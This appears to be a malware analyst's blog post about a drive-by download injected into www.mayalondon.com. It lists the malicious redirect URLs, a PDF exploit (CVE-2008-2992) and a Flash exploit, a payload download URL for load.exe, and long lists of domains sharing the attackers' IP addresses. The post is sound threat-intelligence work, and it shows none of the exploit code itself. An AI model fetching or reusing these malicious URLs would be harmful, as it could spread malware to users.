With using Fiddler tool, I able to capture http network packets that flow between my guest systems and Web Server. The outcome was main page for "www.mayalondon.com" was injected with malicious links. Once users browsers to infected site, the user is redirecting to execute the injected script to:
- http://cbx-north.se/buttons/bothnia.php
- http://bio-age.ru:8080/index.php
and another injected linked "swfobject.js" contain two malicious links
- http://kryolan.com/images/favicon.php
- http://cbx-north.se/buttons/bothnia.php
User not only stopped with one exploit, there have another exploit chains at "http://cbx-north.se/buttons/bothnia.php" that separately load Exploit PDF and and Exploit Flash file to system. The results for malicious Flash file and PDF file exploiting this vulnerability in this attack are still very low.
- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=2 (PDF) (VT 4/41)
- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=3 (Flash) (VT 2/41)
From the script below, "bio-age.ru:8080" contains "Javascript" to perform downloading "Exploit PDF" that contain Adobe util.printf overflow exploit CVE-2008-2992.
Without surprising, Exploit PDF file received minor detection rate from VirusTotal. The attackers used heavily obfuscated Javascript combined with script fragmentation to evade detection. I have to salute attacker to give hard work for analysis.
Exploit PDF file will download malware (load.exe) from "http://youbio.ru:8080/main.php?id=5&hello21" when loaded using unpatch Adobe Reader.
Hostname "bio-age.ru:8080" and "youbio.ru:8080" pointing to same IP Address: 208.67.219.132
"cbx-north.se" -->IP Address: 195.47.247.121
Hostnames sharing same IP:
1099.se
1jma.net
addison.dk
aid-com.be
amodei.net
andersmagnusson.net
archifacts.net
arerosseland.com
arstahavsbad.net
arubalandscape.net
arvidson.dk
aspdalen.net
betinafriis.net
beyondthenorthwaves.net
bgof.net
birgit-iren.net
bogbasen.dk
bornholmerferier.dk
carloscicchelli.net
casa50.net
cbx-north.se
cdrcrd.com
clubcosmos.net
crispycat.com
cybospace.net
datavagen.com
dbs16.dk
eng-dal.net
faudo.net
ferieitoscana.net
fiberdanmark.dk
fjellhamarfk.net
footballglobe.net
fossekallen.net
fotbollstrojor.net
franzensandberg.net
frodeandersen.net
gizl.nl
glitr.net
gmprod.net
goergen.net
grandiscrew.net
gunmancentral.net
hanekam.net
haraldriise.net
hounds.dk
hsl.be
indelfa.com
innovationmarket.net
insats.net
insg.nl
instituut-waldorf.be
jeromedeperlinghi.net
jhlan.net
jkann.net
jolv.net
ka-kjing.net
kaffesukker.net
kajhelge.net
kloverblomman.net
koksijde.net
kureer.net
kvalitena.net
leeuwerke.net
leksebistand.net
lemuelbooks.net
lifeonacouch.net
lillehammerbaptist.net
loshavnsidene.net
lostinberlin.net
lyd-tekniker.net
mail2.nykroppa.se
malerimetoder.se
memorybar.net
mhastings.net
mitrapa.se
morden.dk
muzinfo.net
nittfors.net
ns2.cdrcrd.com
nykroppa.se
oehlenschlager.dk
ole-andreas.net
olethore.net
oppegaende.net
oshorisk.dk
peture.net
pilegrim.net
problematisk.net
relihq.net
rkcc.dk
roennerhavnen.dk
seules.net
sidenmin.net
sikkerhedsnettet.net
smuthullet.net
spar2design.dk
spd-mv.de
srv71.b-one.net
stromvoll.net
sunile.no
sunnydisposition.net
thaiwok.se
theien.net
theil.dk
tollerforum.net
trikster.net
trim1.net
ultra-ragnar.net
usenethelp.net
vinnpenger.net
voldesign.net
webbkampanj.net
wickedfriends.net
www.bornholmerferier.dk
www.malerimetoder.se
www.mitrapa.se
www.pirken.dk
www.sunile.no
www.thaiwok.se
xweza.com
zirconium-inc.net
IP Address: 208.67.219.132
bio-age.ru:8080
youbio.ru:8080
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org
IP Address: 78.46.45.77
*.bestensee.de
*.kryolan.com
*.omatix.de
bestensee.de
cydico.com
dermacolor-camouflage.net
gut.de
haby.net
kryolan.us
kryolan.com
linear-software.de
lwb-info.de
omatix.de
rbo-info.de
s10.omatix.de
static.77.45.46.78.clients.your-server.de
www.bestensee.de
www.kryolan.de
www.omatix.de
P/S: The Webmaster for "www.mayalondon.com" suspend their website for maintenance to clean up "malicious" codes.
0 comments:
Post a Comment